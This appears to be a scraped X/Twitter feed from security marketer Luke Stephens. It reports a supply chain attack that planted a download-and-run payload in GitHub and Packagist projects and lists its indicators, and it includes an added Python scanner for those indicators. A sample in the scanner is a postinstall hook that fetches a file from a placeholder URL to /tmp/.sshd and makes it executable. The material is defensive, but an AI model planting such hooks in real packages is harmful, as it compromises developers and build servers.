Luke Stephens (hakluke)
14.5K posts

@hakluke
Hacker, marketer. I manage socials and marketing for cybersecurity orgs. Founder of @hacker_content and @haksecio
🇦🇺🦘 Joined July 2017
2K Following · 99.6K Followers
Luke Stephens (hakluke) retweeted

‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages.
8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies.
The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected.
IOCs:
GitHub account parikhpreyash4
repo systemd-network-helper-aa5c751f
drop path /tmp/.sshd
command fragments curl -skL and chmod +x /tmp/.sshd.
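
A repository sweep for the indicators listed in the post above, as an added example that is not part of the original post. It checks the `scripts` object of every `package.json` (including those under `vendor/` and `node_modules/`) and every GitHub Actions workflow file; the function names and the two sample inputs are constructed for illustration.

```python
import json, os

# Indicators quoted in the post above; nothing else about the payload is assumed.
INDICATORS = ["parikhpreyash4", "systemd-network-helper-aa5c751f",
              "/tmp/.sshd", "curl -skL", "Dependency Cache Sync"]

# Constructed samples (not taken from any real repository).
SAMPLE_PACKAGE_JSON = json.dumps({"name": "demo", "scripts": {
    "build": "vite build",
    "postinstall": "curl -skL <PLACEHOLDER_URL> -o /tmp/.sshd; chmod +x /tmp/.sshd"}})
SAMPLE_WORKFLOW = ("steps:\n  - uses: actions/checkout@v4\n"
                   "  - name: Dependency Cache Sync\n    run: echo placeholder\n")

def match_indicators(text):
    """Return the indicators present in text (case-sensitive substring match)."""
    return [i for i in INDICATORS if i in text]

def scan_package_json(text):
    """Return {script_name: [indicators]} for the manifest's "scripts" object."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (ValueError, AttributeError):
        hits = match_indicators(text)      # unparseable manifest: raw text match
        return {"<raw>": hits} if hits else {}
    if not isinstance(scripts, dict):
        return {}
    found = {name: match_indicators(str(cmd)) for name, cmd in scripts.items()}
    return {name: hits for name, hits in found.items() if hits}

def scan_tree(root):
    """Return [(path, findings)] for package.json and GitHub Actions workflow files.
    vendor/ and node_modules/ are walked on purpose: installed packages live there."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        in_workflows = dirpath.replace(os.sep, "/").endswith(".github/workflows")
        for fn in filenames:
            is_workflow = in_workflows and fn.endswith((".yml", ".yaml"))
            if fn != "package.json" and not is_workflow:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = scan_package_json(text) if fn == "package.json" else match_indicators(text)
            if hits:
                results.append((path, hits))
    return results

if __name__ == "__main__":
    for path, hits in scan_tree("."):
        print(path, hits)
```

A clean result only means these exact strings are absent; it says nothing about variants that use a different path or step name.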


Luke Stephens (hakluke) retweeted

Let's solve the "Blind OS command injection with out-of-band interaction" lab together!
Follow along here 👉 portswigger.net/web-security/o…

@flipper_net If you're willing to forego the London requirement, @hacker_content would slay this.

HIRING! Social Media Writer/Manager
Responsibilities:
- Publish content created by our creative team
- Reply to comments
- Share community content
- Write text posts
Requirements:
- Experience in social media
- Tech-savvy
- Based in London
Learn more: flipperdevices.com/jobs/?ashby_ji…

Luke Stephens (hakluke) retweeted

We're finally ready to talk about Flipper One — a project we've been grinding on for years and have rebuilt from scratch several times. Read blog post >>
blog.flipper.net/flipper-one-we…

@feross You should absolutely use this as a testimonial

TeamPCP just did an interview where they were asked what defenders should do to stop supply chain attacks.
Their advice: pin versions to a specific hash, use least-privilege tokens, restrict IDE extensions. And then, verbatim: "The company Socket will detect the malware before the package even reaches your machine."
So... thanks, I think?
We're not putting this on the testimonials page.
But at the same time, if you're not yet using @SocketSecurity to protect your supply chain, what are you waiting for?

Luke Stephens (hakluke) retweeted

🛑 If you're marketing a cybersecurity company - read this.
Imagine how many of your problems you could solve if there was a company that:
👉 Specialized in cybersecurity marketing specifically
👉 Had a team that was technical so that they could deeply understand your product
👉 Had worked with many of the largest companies in the world including Cisco, Google, Tenable, Semgrep, Wiz, Bugcrowd, HackerOne...
👉 Had designed and executed some of the most successful cybersecurity marketing campaigns ever
👉 Is currently managing a bunch of cybersecurity brand accounts and founder accounts on socials
👉 Wanted to work with you
Wouldn't that just be a dream?
hackercontent.com
Luke Stephens (hakluke) retweeted

1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories.
Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
Luke Stephens (hakluke) retweeted

We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.
Luke Stephens (hakluke) retweeted

Had a great chat with the founders of @Ethiack, @0xacb and @jbmonteiro about AI in offensive cybersecurity, Mythos, and all that good stuff. We did this for @Hacker0x01's "Exposed" video series.
youtube.com/watch?v=SnnlZ3…


@mattjay I think everyone knows that the answer is "we're not"






